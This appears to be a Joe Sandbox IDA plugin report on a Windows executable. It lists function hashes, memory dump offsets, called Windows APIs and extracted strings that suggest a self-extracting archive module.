                                              • Instruction ID: 5231a1eb4432185db7b9561a0f10355301cd022023d7a6a8d333d79978ac388e
                                              • Instruction Fuzzy Hash: 4082E9316047868FCB29CF28C5906BABBE1AF97308F14895DD8AB8B743D735AD45CB11
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 9e3fe84a7a2c79f4cf06f84ccd0765a7d158f0ab099874caad6c5a58dc7a89bc
                                              • Instruction ID: 6c64b1d23984be5f4bfe7f26f9007489e1df553ef54c889aa99d16e651352d17
                                              • Instruction Fuzzy Hash: FC823D65D39F895EE303963484022EBF3A86EF71C9F46D71FF8A431526E721A6C75201
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 957e3e4f770764865b5c084bd61d322db280cc563c89754f50ffbe7270592e0c
                                              • Instruction ID: 6ee3fa29e7c50a819a7ccf1257cefb1bcd4a5789ad3a1a8a42b977a03bf3ce7c
                                              • Instruction Fuzzy Hash: 107226316043868FCB15CF68C8D06B9BBE1BF96308F18C56DE89A8B346D734E946DB11
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 605082976fd6bcb660ea90b2928608d33a4af8ea1a4694150b2d300d36c2867c
                                              • Instruction ID: 4b589ae7c3e77a1d066940a37957f074d096e9439c3c383f8f8baa098a35243d
                                              • Instruction Fuzzy Hash: 6F524B726187018FC718CF19C891A6AF7E1FFCC304F498A2DE5959B255D334EA19CB86
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 71706001349c3364b16b6b5491d79266427021637149d04f3b03230fdf6c7208
                                              • Instruction ID: 745efd2140949c70e8bd8553f1d528f969101626779016c480534dc384f45473
                                              • Instruction Fuzzy Hash: 8212D2716047078FD728CF68C895BB9B7E0FF45308F148A2EE59AC7282E774A995DB01
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 69c1cebaecb3c964dc56332b8f1616fbeb960f775f2420a0aa0fae4862a005aa
                                              • Instruction ID: 6ce225c87f7588e4c0a038aa835b8de9b112fb7fadc3d9e1be5d8f00bddddcec
                                              • Instruction Fuzzy Hash: 26E14AB55083D58FC344CF29D88566ABBE0BF99300F46095EF9E49B352C334EA16DB62
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c5e20fbda363a406ff6bdb0404c78e0de913a58b678ca25298e7893e6ead81bd
                                              • Instruction ID: cd92f2301d3aad7a732defacf5ebe20f6fb075759920b232044f93cd035b9f8f
                                              • Opcode Fuzzy Hash: c5e20fbda363a406ff6bdb0404c78e0de913a58b678ca25298e7893e6ead81bd
                                              • Instruction Fuzzy Hash: CE9146313083434FDB25DE68C885BAE77D2AB96308F14093CF99A87282DB74D986D753
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5ffbb50667f8af0b4aeffa95fe614394d8f4247d2509b1f77cb5384fe6a7e72
                                              • Instruction ID: 89586573d4ad943f5a281907398c185fc8abbdb81b675b6fbef1de96bda9d114
                                              • Opcode Fuzzy Hash: b5ffbb50667f8af0b4aeffa95fe614394d8f4247d2509b1f77cb5384fe6a7e72
                                              • Instruction Fuzzy Hash: 3961657160060867EE389AAC88E6BFF73D8EF55304F50041AE8B3FF292D6519F429756
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                              • Instruction ID: a012158e6168ce965fb61d551cc8ffabc5636ae1e607d34d45ceca140099f4a7
                                              • Opcode Fuzzy Hash: b9fa34869b2d82e3d8411e2c45cb22e435dbce3bfada8ed8319a2114c0e74f89
                                              • Instruction Fuzzy Hash: C951CB3520078997EF3499AE88D6BFF27D99B12300F18050AE967CB6A2C7C5DF05E721
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 76fe5219caaa263e59172cddc2fdfc83bc9c0eec66f83550b55a47f04654e2cc
                                              • Instruction ID: d72ce4f70640e093a938e1046867cdddb9901907b31d7065db25def645c356ca
                                              • Opcode Fuzzy Hash: 76fe5219caaa263e59172cddc2fdfc83bc9c0eec66f83550b55a47f04654e2cc
                                              • Instruction Fuzzy Hash: DB51F1315083964FC715DF28C4845AEFFE0AEDA218F0A499EE1E55B142D230EB4ACB52
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 721d4b953a1c6d75b6c6a1d9a7c71ce7cf6a7d097dccb37f17886ebe5f994556
                                              • Instruction ID: 815edc2a76d37388a4a5f9ed7a2e20202c8dda3a577df8243c56610059900d0a
                                              • Opcode Fuzzy Hash: 721d4b953a1c6d75b6c6a1d9a7c71ce7cf6a7d097dccb37f17886ebe5f994556
                                              • Instruction Fuzzy Hash: BB51CDB1A087119FC758CF29D88055AF7E1BF88314F058A2EF899E7740DB30E9598B96
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                              • Instruction ID: 3300cd2660595e3f7b342fcbb3ffb12bcf37711aa5b33848794c6b585015678f
                                              • Opcode Fuzzy Hash: 05051f28e1c7025b01332903b260566e0dad3863efea20ce7ce926dc4f85ab64
                                              • Instruction Fuzzy Hash: AC3112B16047069FCB14DF28C85166EBBE0FB96314F104A3DE49AC3342C735E94ADB92
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                              • Instruction ID: 989fc5aba733741521035ace9047eaa261885f3b98184e658608ac55bcf00ae6
                                              • Opcode Fuzzy Hash: df13c561cf512fd72e314f0c8c275dfb4e9792f9b659da3cf5682587dc4af2d2
                                              • Instruction Fuzzy Hash: 5441F630515B11CFC71ADF34E5999A6B7E0FF4A700B1249AFD06A8B231EB30EA04DB59
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction ID: 9598d4f15a34854031680b977b2ebc953874dc7ad73ad727f8f62907c1b8f5fc
                                              • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                              • Instruction Fuzzy Hash: 551108B724415243D6148A3ED4B46FBB3E9EAC6320F6C427AD3624B6F8D232EB459900
                                              APIs
                                              • _swprintf.LIBCMT ref: 00CA3EEA
                                                • Part of subcall function 00C9F6BA: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C9F6CD
                                                • Part of subcall function 00CA89ED: WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000050,?,00000000,00000000,00CDE088,?,00000007,00CA33E2,?,?,00000050,9CAA5719), ref: 00CA8A0A
                                              • _strlen.LIBCMT ref: 00CA3F0B
                                              • SetDlgItemTextW.USER32(?,00CD919C,?), ref: 00CA3F64
                                              • GetWindowRect.USER32(?,?), ref: 00CA3F9A
                                              • GetClientRect.USER32(?,?), ref: 00CA3FA6
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00CA4051
                                              • GetWindowRect.USER32(?,?), ref: 00CA4081
                                              • SetWindowTextW.USER32(?,?), ref: 00CA40B0
                                              • GetSystemMetrics.USER32(00000008), ref: 00CA40B8
                                              • GetWindow.USER32(?,00000005), ref: 00CA40C3
                                              • GetWindowRect.USER32(00000000,?), ref: 00CA40F3
                                              • GetWindow.USER32(00000000,00000002), ref: 00CA4165
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                              • String ID: $%s:$CAPTION$d
                                              • API String ID: 2407758923-2512411981
                                              • Opcode ID: 51f938d85ed5b7f99a26115ab59d63fa6eecabc55d3ddd49114f3dc0b2e52d6d
                                              • Instruction ID: 14b6e796240937b053571c86df7528c3c55a1079f10976a5d5e1014908e374c7
                                              • Opcode Fuzzy Hash: 51f938d85ed5b7f99a26115ab59d63fa6eecabc55d3ddd49114f3dc0b2e52d6d
                                              • Instruction Fuzzy Hash: A1817C72508342AFD714DFA8CD89B6FBBE9EBC9704F00091DFA8997250D774E9098B52
                                              APIs
                                              • InitializeCriticalSectionAndSpinCount.KERNEL32(00CE60E0,00000FA0,?,?,00CB6185), ref: 00CB61B3
                                              • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,00CB6185), ref: 00CB61BE
                                              • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,00CB6185), ref: 00CB61CF
                                              • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00CB61E1
                                              • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00CB61EF
                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,00CB6185), ref: 00CB6212
                                              • DeleteCriticalSection.KERNEL32(00CE60E0,00000007,?,?,00CB6185), ref: 00CB6235
                                              • CloseHandle.KERNEL32(00000000,?,?,00CB6185), ref: 00CB6245
                                              Strings
                                              • SleepConditionVariableCS, xrefs: 00CB61DB
                                              • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00CB61B9
                                              • WakeAllConditionVariable, xrefs: 00CB61E7
                                              • kernel32.dll, xrefs: 00CB61CA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                              • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                              • API String ID: 2565136772-3242537097
                                              • Opcode ID: f2d265849079355e4a2927243986f8c7681187ef2a3796b9fb546c05893ee9c1
                                              • Instruction ID: d7b36e9816de52e3d041395d905f15b2a721a32efaf162eaa902c2201d323c29
                                              • Opcode Fuzzy Hash: f2d265849079355e4a2927243986f8c7681187ef2a3796b9fb546c05893ee9c1
                                              • Instruction Fuzzy Hash: 0201F770A50371EBDB201B76EC8DF9E3A6CFB15B81B004425F929D6250DA68C9008A71
                                              APIs
                                              • ___free_lconv_mon.LIBCMT ref: 00CC3816
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC33CE
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC33E0
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC33F2
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3404
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3416
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3428
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC343A
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC344C
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC345E
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3470
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3482
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC3494
                                                • Part of subcall function 00CC33B1: _free.LIBCMT ref: 00CC34A6
                                              • _free.LIBCMT ref: 00CC380B
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CC382D
                                              • _free.LIBCMT ref: 00CC3842
                                              • _free.LIBCMT ref: 00CC384D
                                              • _free.LIBCMT ref: 00CC386F
                                              • _free.LIBCMT ref: 00CC3882
                                              • _free.LIBCMT ref: 00CC3890
                                              • _free.LIBCMT ref: 00CC389B
                                              • _free.LIBCMT ref: 00CC38D3
                                              • _free.LIBCMT ref: 00CC38DA
                                              • _free.LIBCMT ref: 00CC38F7
                                              • _free.LIBCMT ref: 00CC390F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                              • String ID:
                                              • API String ID: 161543041-0
                                              • Opcode ID: 7b44737b1100049393035d55c76f797c686e003a3d47ba58e8ca978ea9f6366f
                                              • Instruction ID: a930cb604dd641765e246542d2d79e26b3a998b25190c3a5a2226d858a8d2b22
                                              • Opcode Fuzzy Hash: 7b44737b1100049393035d55c76f797c686e003a3d47ba58e8ca978ea9f6366f
                                              • Instruction Fuzzy Hash: 61315031504384DFEB21AA79E845F56B3E9EF00310F28846EF468D75A1DE71AE84DB20
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00CAD919
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              • _wcslen.LIBCMT ref: 00CAD97B
                                              • _wcslen.LIBCMT ref: 00CAD99A
                                              • _wcslen.LIBCMT ref: 00CAD9B6
                                              • _strlen.LIBCMT ref: 00CADA14
                                              • GlobalAlloc.KERNEL32(00000040,?,00000000,00CCD9F0,00000000,?,00000000,?,<html>,00000006,<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>,?), ref: 00CADA2D
                                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 00CADA54
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: _wcslen$Global$AllocCreateH_prolog3_Stream_strlen
                                              • String ID: </html>$<html>$<html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"></head>$<style>body{font-family:"Arial";font-size:12;}</style>
                                              • API String ID: 1185167184-1533471033
                                              • Opcode ID: 38db03d4c030f2d6467441b731acff0f84712c1a36152524742de19d822a77da
                                              • Instruction ID: 2dd7a10a3b2f8645e0c8ab158feeb46656f4525d4decabfe9c07fe0ec3020451
                                              • Opcode Fuzzy Hash: 38db03d4c030f2d6467441b731acff0f84712c1a36152524742de19d822a77da
                                              • Instruction Fuzzy Hash: 48510D71D1021AAFEF04EBA0CC86BEEBBB9AF16314F140029E506BB185DF705E45D7A5
                                              APIs
                                              • GetWindow.USER32(?,00000005), ref: 00CB37C4
                                              • GetClassNameW.USER32(00000000,?,00000080), ref: 00CB37F0
                                                • Part of subcall function 00CA8DA4: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,000000FF,00CA0E3F,?,?,?,00000046,00CA1ECE,00000046,?,exe,00000046), ref: 00CA8DBA
                                              • GetWindowLongW.USER32(00000000,000000F0), ref: 00CB380C
                                              • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 00CB3823
                                              • GetObjectW.GDI32(00000000,00000018,?), ref: 00CB3837
                                              • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 00CB3860
                                              • DeleteObject.GDI32(00000000), ref: 00CB3867
                                              • GetWindow.USER32(00000000,00000002), ref: 00CB3870
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.2247202846.0000000000C91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C90000, based on PE: true
                                               • Associated: 00000000.00000002.2247139063.0000000000C90000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247325715.0000000000CCC000.00000002.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CD9000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247354847.0000000000CE2000.00000004.00000001.01000000.00000003.sdmp
                                               • Associated: 00000000.00000002.2247489117.0000000000CE7000.00000002.00000001.01000000.00000003.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_c90000_u549ed5dEA.jbxd
                                              Similarity
                                              • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                                              • String ID: STATIC
                                              • API String ID: 3820355801-1882779555
                                              APIs
                                              • _free.LIBCMT ref: 00CBFF25
                                                • Part of subcall function 00CC03D4: RtlFreeHeap.NTDLL(00000000,00000000,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?), ref: 00CC03EA
                                                • Part of subcall function 00CC03D4: GetLastError.KERNEL32(?,?,00CC3546,?,00000000,?,00000000,?,00CC356D,?,00000007,?,?,00CC396A,?,?), ref: 00CC03FC
                                              • _free.LIBCMT ref: 00CBFF31
                                              • _free.LIBCMT ref: 00CBFF3C
                                              • _free.LIBCMT ref: 00CBFF47
                                              • _free.LIBCMT ref: 00CBFF52
                                              • _free.LIBCMT ref: 00CBFF5D
                                              • _free.LIBCMT ref: 00CBFF68
                                              • _free.LIBCMT ref: 00CBFF73
                                              • _free.LIBCMT ref: 00CBFF7E
                                              • _free.LIBCMT ref: 00CBFF8C
                                              Similarity
                                              • API ID: _free$ErrorFreeHeapLast
                                              • String ID:
                                              • API String ID: 776569668-0
                                              Similarity
                                              • API ID: CallFramesMatchNestedTypeUnexpectedUnwind_aborttype_info::operator==
                                              • String ID: csm$csm$csm
                                              • API String ID: 322700389-393685449
                                              APIs
                                              • __EH_prolog3_GS.LIBCMT ref: 00C9D99A
                                              • GetLongPathNameW.KERNEL32(?,00000000,00000000), ref: 00C9D9BF
                                              • GetLongPathNameW.KERNEL32(?,?,?), ref: 00C9DA11
                                              • GetShortPathNameW.KERNEL32(?,00000000,00000000), ref: 00C9DA34
                                              • GetShortPathNameW.KERNEL32(?,?,?), ref: 00C9DA84
                                              • MoveFileW.KERNEL32(-00000040,-00000028), ref: 00C9DC9F
                                              • MoveFileW.KERNEL32(-00000028,-00000040), ref: 00C9DCEC
                                                • Part of subcall function 00C914A7: _wcslen.LIBCMT ref: 00C914B8
                                              Similarity
                                              • API ID: NamePath$FileLongMoveShort$H_prolog3__wcslen
                                              • String ID: rtmp
                                              • API String ID: 2388273531-870060881
                                              Similarity
                                              • API ID: H_prolog3__wcslen
                                              • String ID: .rar$exe$rar$sfx
                                              • API String ID: 3251556500-630704357
                                              APIs
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00CA04AB,00CA04AD,00000000,00000000,9CAA5719,00000001,00000000,00000000,?,00CA038C,?,00000004,00CA04AB,ROOT\CIMV2), ref: 00CB5459
                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00CA04AB,?,00000000,00000000,?,?,00CA038C,?,00000004,00CA04AB), ref: 00CB54D4
                                              • SysAllocString.OLEAUT32(00000000), ref: 00CB54DF
                                              • _com_issue_error.COMSUPP ref: 00CB5508
                                              • _com_issue_error.COMSUPP ref: 00CB5512
                                              • GetLastError.KERNEL32(80070057,9CAA5719,00000001,00000000,00000000,?,00CA038C,?,00000004,00CA04AB,ROOT\CIMV2), ref: 00CB5517
                                              • _com_issue_error.COMSUPP ref: 00CB552A
                                              • GetLastError.KERNEL32(00000000,?,00CA038C,?,00000004,00CA04AB,ROOT\CIMV2), ref: 00CB5540
                                              • _com_issue_error.COMSUPP ref: 00CB5553
                                              Similarity
                                              • API ID: _com_issue_error$ByteCharErrorLastMultiWide$AllocString
                                              • String ID:
                                              • API String ID: 1353541977-0
                                              APIs
                                              • __EH_prolog3.LIBCMT ref: 00CA0470
                                                • Part of subcall function 00CA0360: __EH_prolog3.LIBCMT ref: 00CA0367
                                              • VariantClear.OLEAUT32(?), ref: 00CA05FA
                                              Similarity
                                              • API ID: H_prolog3$ClearVariant
                                              • String ID: Name$ROOT\CIMV2$SELECT * FROM Win32_OperatingSystem$WQL$Windows 10
                                              • API String ID: 4196654922-3505469590
                                              Similarity
                                              • API ID: H_prolog3_wcslen
                                              • String ID: $</p>$</style>$<br>$<style>
                                              • API String ID: 3746244732-3393513139
                                              APIs
                                                • Part of subcall function 00C91E44: GetDlgItem.USER32(00000000,00003021), ref: 00C91E88
                                                • Part of subcall function 00C91E44: SetWindowTextW.USER32(00000000,00CCC6C8), ref: 00C91E9E
                                              • EndDialog.USER32(?,00000001), ref: 00CB0720
                                              • SendMessageW.USER32(?,00000080,00000001,00040449), ref: 00CB0747
                                              • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,01050E65), ref: 00CB0760
                                              • GetDlgItem.USER32(?,00000065), ref: 00CB077C
                                              • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 00CB0790
                                              • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 00CB07A6
                                              Similarity
                                              • API ID: MessageSend$Item$DialogTextWindow
                                              • String ID: LICENSEDLG
                                              • API String ID: 3077722735-2177901306
                                              APIs
                                              • __aulldiv.LIBCMT ref: 00CA783D
                                                • Part of subcall function 00CA067E: GetVersionExW.KERNEL32(?), ref: 00CA06AF
                                              • FileTimeToLocalFileTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00CA7860
                                              • FileTimeToSystemTime.KERNEL32(000000FF,?,?,000000FF,00000064,00000000,?,00000000), ref: 00CA7872
                                              • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 00CA7883
